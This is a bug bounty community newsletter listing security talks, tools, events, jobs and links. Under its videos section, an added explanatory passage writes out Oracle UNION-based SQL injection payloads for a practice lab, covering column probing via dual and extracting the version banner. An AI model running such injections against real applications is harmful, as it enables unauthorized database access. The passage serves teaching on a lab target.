🐝 Hive Five #15 – Protect Linux server from hackers, the power of being a misfit, and bee facts
Photo by Olenka Varzar / Unsplash
Hi friends,
Greetings from the hive!
I hope you had an awesome week. Mine was filled with several interesting meetings. We did some gardening as a family over the weekend. On Sunday I tuned into NahamSec's stream as usual. This time I was excited to see Shubs demo Kiterunner.
Let's take this week by swarm!
🐝 The Bee's Knees
SHELLCON 2017 - Pages from a sword-maker's notebook (Vyrus): This talk is an encapsulation of implemented solutions for achieving common requirements when constructing software designed to perform long-term covert intelligence gathering.
AutoGraphQL: created to make authorization testing of GraphQL APIs more enjoyable and easy by generating queries and schemas automatically. How-to guide.
Fundamentals of Bug Bounty Recon: Let's discuss the fundamentals you need to properly understand recon as it relates to security. Article.
Protect Linux Server From Hackers: Do you have a Linux server, and do you know how to prevent it from getting hacked? In this video LiveOverflow critically discusses a few commonly recommended best practices. The video can be summarized as: "a lot of fluff, not much use".
API Recon with Kiterunner - Hacker Toolbox: Kiterunner is a brand new tool for API recon which launched last week, and it's incredible. Katie was so impressed when testing it out that she had to share it, because this will be a game-changer for API recon.
💌 Sustain-A-Bee
Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.
🔥 Buzzworthy
✅ Changelog
Latest additions to my bug bounty Twitter list: coffeejunkiee_, h1_yusuf, h4x0r_dz, haxor31337, ReeverZax, robd4k, sillydadddy.
Ffuf 1.3.0 is out: This is a major quality of life release, as it introduces an interactive mode of operation.
COSMIC to Arrive in June Release of Pop!_OS 21.04: System76, the creators of the Pop!_OS Linux distribution, announced that they will be releasing their own desktop environment based on GNOME this coming June. Video.
Deno 1.9: This release contains many new features, performance improvements, and bug fixes.
Twitter is working on the ability to adjust the duration of the Undo Tweet timer.
📅 Events
GitHub Education: Launching the first show of Security Shorts this Tuesday at 7:00 PM IST by @HarishTeens and @Th3lazykid with @harshbothra_.
SANS ICS: At the upcoming NewtoCyberSummit, @hacks4pancakes will speak on Landing a Job: Resumes and the Application Process.
OWASP Lightning Events 2021: Hacking APIs for beginners on May 12, 2021.
🎉 Celebrate
Ahmad Halabi: reached Top 50 Hackers All Time on HackerOne. Amazing!
Lupin: One year after his first bounty on HackerOne, triaged by @pxmme1337, he now has a full time position at @ManoMano_FR as a Security Hunter (Red Team). Awesome!
YesWeHack: The final leaderboard for WILDCART is here: 1st @honoki, 2nd @ReeverZax, 3rd @Gromak123_Sec. Congrats!
Sam Curry: bought a house and might get a cat. Well deserved!
Bug Bounty Reports Explained: 18k subscribers and 350k views in one year of the Bug Bounty Reports Explained channel. So cool!
💰 Jobs
Lesley Carhart: Dragos has 4 open IT (not cybersecurity) roles right now: cloud, sysadmin, logistics, on top of open security and intel roles.
Jason Haddix: Ubisoft is looking for a SOC Leader.
Job opportunity: Google Web Creators…needs you!: TL;DR: If you’re a prolific content creator on the web, and if you want to help others achieve the same, there’s a new unique part-time job opportunity for you.
Calling all public interest tech researchers!: CR’s (Consumer Reports) Digital Lab is accepting applications for paid, non-resident fellows to uncover and solve for consumer harms in the digital world.
No Starch Press Foundation Application Process: NSPF will award up to $100,000 USD in grants of no less than $10,000 each to projects that are designed to grow the worldwide hacker community, and support STE(A)M education initiatives - accepting applications until 11:59 p.m. PST on Monday, Sept. 6, 2021.
📰 Articles
Duo published an advisory about a 2FA bypass: @KammerlingShaun and team reported it and wrote a write-up.
The Ultimate Guide to Bugcrowd Incentive Programs: Ever wondered how you can get your hands on some Bugcrowd Swag?
The Power of Being a Misfit: Speaking with Fredrik Alexandersson STÖK: Have you ever noticed some of the most creative thinkers and individuals seem to be misfits?
‘Counter Strike’ Bug Allows Hackers to Take Over a PC With a Steam Invite: Hackers could take control of victims' computers just by tricking them into clicking on a Steam invite to play Counter Strike: Global Offensive, according to a bug report seen by Motherboard.
📚 Resources
Masonhck357: asks for resources on how to best approach a Ruby on Rails application when hacking.
Cheatsheet: XSS that works in 2021: This cheat-sheet focuses on up to date and relevant items only.
Douglas Day: asks how bug bounty hunters transitioned from web apps to native apps or blockchains.
How I got 9000 USD by hacking into iCloud: a vulnerability that they found in iCloud that could allow an attacker to execute malicious code in another iCloud account.
Useful Google Sheets Functions for OSINT research: When conducting a large open source research project, you want a way to store your data and share it with collaborators.
🎥 Videos
SQL Injection - Lab #7 SQL injection attack, querying the database type and version on Oracle: This lab contains a SQL injection vulnerability in the product category field, and the goal is to use it to retrieve the Oracle version string.
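As an added illustration of what the lab title describes (this is not the lab's own solution or source code, and the shape of the backing query is an assumption), here is how a UNION-based injection in a category filter is typically walked up to the Oracle version banner. Oracle-specific details matter: every SELECT needs a FROM clause, so column-count probing uses the DUAL table, and the version lives in the v$version view.

```sql
-- Assumed shape of the vulnerable query behind the "product category" filter
-- (hypothetical; the real lab query is not shown on this page):
SELECT name, description FROM products WHERE category = 'Gifts';

-- Step 1: find the number of columns the original SELECT returns.
-- Oracle rejects a SELECT without FROM, so DUAL is used as a dummy table.
-- Injected value for category:   ' UNION SELECT NULL,NULL FROM dual--
SELECT name, description FROM products
WHERE category = '' UNION SELECT NULL, NULL FROM dual--';

-- Step 2: once the column count matches (no error), swap a NULL for a
-- string column and pull the banner from the Oracle-specific v$version view.
-- Injected value for category:   ' UNION SELECT banner,NULL FROM v$version--
SELECT name, description FROM products
WHERE category = '' UNION SELECT banner, NULL FROM v$version--';
```

The trailing `--` comments out the application's closing quote. If the first attempt errors, adjust the number of NULLs until the database accepts the UNION; the fact that `FROM dual` is required at all is itself a strong hint that the backend is Oracle before v$version ever returns a row.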
How to use the Internet Archive: This introduction video provides a quick introduction to the major collections in the library and provides pointers on how to find books.
Videos of 2021 Open Hardware Summit: All the talks from the 2021 Open Hardware Summit are now available as a YouTube playlist.
🎵 Audio
Eva: talked to Avast about protecting vulnerable populations, why she cares so much about stalkerware, and how privacy ain't dead.